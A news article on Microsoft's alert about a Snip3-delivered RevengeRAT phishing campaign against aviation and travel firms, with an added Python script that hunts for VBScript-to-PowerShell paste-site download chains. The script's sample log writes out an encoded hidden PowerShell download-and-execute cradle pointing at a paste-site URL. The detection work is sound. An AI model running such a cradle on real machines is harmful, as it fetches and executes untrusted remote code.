Security news site Threatpost reports that Microsoft has issued an alert about a remote access trojan (RAT) campaign targeting the aviation and travel industries. The RevengeRAT campaign can harvest screenshots, keystrokes, webcam feeds, credentials, and browser data.
Microsoft has published detection guidance on GitHub that security teams can use to check their networks for these threats, and its Microsoft Security Intelligence team has detailed how phishing emails are used to deliver RevengeRAT.
Security vendor Morphisec dubbed the crypter service "Snip3," after a username found in the malware across earlier variants.
Snip3 is a highly sophisticated crypter-as-a-service that delivers numerous RAT families onto a variety of target machines.
The payload is most commonly delivered through phishing emails. If the target clicks on an image in the email, a malicious VBScript is downloaded; the Snip3 loader it launches then drops the RAT payloads (RevengeRAT or AsyncRAT).
Using phishing emails to deliver RevengeRAT
The phishing emails contain an image disguised as a PDF file, with an embedded link. The emails often evade security filters because the link points to a legitimate web service.
“The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads,” Microsoft said.
— Threatpost (@threatpost) May 13, 2021
Once active, the RATs connect to a command-and-control (C2) server and then download further stages from paste sites such as pastebin[.]com.
"The RATs connect to a C2 server hosted on a dynamic hosting site to register with the attackers, and then use a UTF-8-encoded PowerShell and fileless techniques to download three additional stages from pastebin[.]com or similar sites," reports Microsoft Security Intelligence.
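The behaviour Microsoft describes (a VBScript host launching PowerShell that pulls later stages from a paste site) is something a defender can hunt for in process-creation telemetry. The following is an added example, not Microsoft's GitHub hunting content and not anything from the campaign itself. The log schema, field names and sample events are constructed for the illustration; the decoding of `-EncodedCommand` (base64 over UTF-16LE) and the download-cradle keywords are common PowerShell heuristics assumed here, not details the article specifies.

```python
"""Hunt for script-host -> PowerShell -> paste-site chains in process events.

Added example (not Microsoft's published queries). Log format, field names
and the sample events below are constructed; adapt basename()/field names
to your EDR's process-creation schema.
"""
import base64
import json
import re
from typing import Dict, Iterable, List

# Script hosts that run VBScript; the article's chain starts from a .vbs.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# pastebin[.]com is named in the article; the other two are assumed
# "similar sites" and should be replaced by what your telemetry shows.
PASTE_SITE_RE = re.compile(r"\b(?:pastebin\.com|paste\.ee|hastebin\.com)\b", re.I)

# Download-and-execute cradles: a heuristic, not a signature from the article.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\biex\b|Invoke-Expression",
    re.I,
)

# -e / -en / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand text (base64 of UTF-16LE), or ''."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return ""


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_log(text: str) -> List[Dict]:
    """One JSON object per line; blank lines are ignored."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events: Iterable[Dict]) -> List[Dict]:
    """Flag PowerShell processes that show at least two suspicious traits."""
    events = list(events)
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in POWERSHELL:
            continue
        reasons = []
        parent = by_pid.get(e["ppid"])
        if parent and basename(parent["image"]) in SCRIPT_HOSTS:
            reasons.append("script-host-parent")
        # Inspect both the raw command line and any decoded -enc payload.
        text = e["cmdline"] + " " + decode_encoded_command(e["cmdline"])
        if PASTE_SITE_RE.search(text):
            reasons.append("paste-site-url")
        if CRADLE_RE.search(text):
            reasons.append("download-cradle")
        if ENC_RE.search(e["cmdline"]):
            reasons.append("encoded-command")
        if len(reasons) >= 2:  # a lone cradle from an admin is not enough
            findings.append({"pid": e["pid"], "host": e["host"], "reasons": reasons})
    return findings


# Constructed sample telemetry (not real incident data). The URL is fake.
STAGE2_CMD = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/stage2')"
ENCODED = base64.b64encode(STAGE2_CMD.encode("utf-16-le")).decode()
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"ts": "2021-05-13T09:01:02Z", "host": "WS01", "pid": 1204, "ppid": 880,
     "image": "C:\\Windows\\System32\\wscript.exe",
     "cmdline": "wscript.exe C:\\Users\\user\\Downloads\\Cargo_Manifest.vbs"},
    {"ts": "2021-05-13T09:01:03Z", "host": "WS01", "pid": 1310, "ppid": 1204,
     "image": PS, "cmdline": "powershell.exe -w hidden -nop -enc " + ENCODED},
    {"ts": "2021-05-13T10:15:00Z", "host": "WS02", "pid": 2200, "ppid": 1900,
     "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    {"ts": "2021-05-13T10:15:05Z", "host": "WS02", "pid": 2212, "ppid": 2200,
     "image": PS, "cmdline": "powershell.exe -c Get-ChildItem C:\\Logs | Measure-Object"},
])


def run_sample() -> List[Dict]:
    return detect(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for f in run_sample():
        print(f)
```

The two-trait threshold keeps an administrator's interactive `Invoke-WebRequest` from alerting on its own, while the wscript-spawned, encoded, paste-site-fetching PowerShell in the sample trips four traits. Parent-process fields can be spoofed or lost when the parent exits early, so treat the parent check as one signal among several rather than a hard requirement.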
Roger Grimes, tech evangelist at KnowBe4, says the RevengeRAT campaign reflects a new development in malware gang activity: rather than the usual financial and government targets, the operators specialize in a specific vertical sector, use precise, industry-relevant lures in their phishing emails, and tailor the campaign into a more directed attack.
"The targeting of particular industries is now often pointing to particular malware gangs," he explained to Threatpost. "Many gangs have become more specialized, targeting a specific industry that they have especially good experience and success in. To increase the chances of getting a potential victim to execute malware, the attacker has to make the social-engineering and phishing attack seem as close to an internal or partner communication as possible. Specializing in a particular industry helps to do this."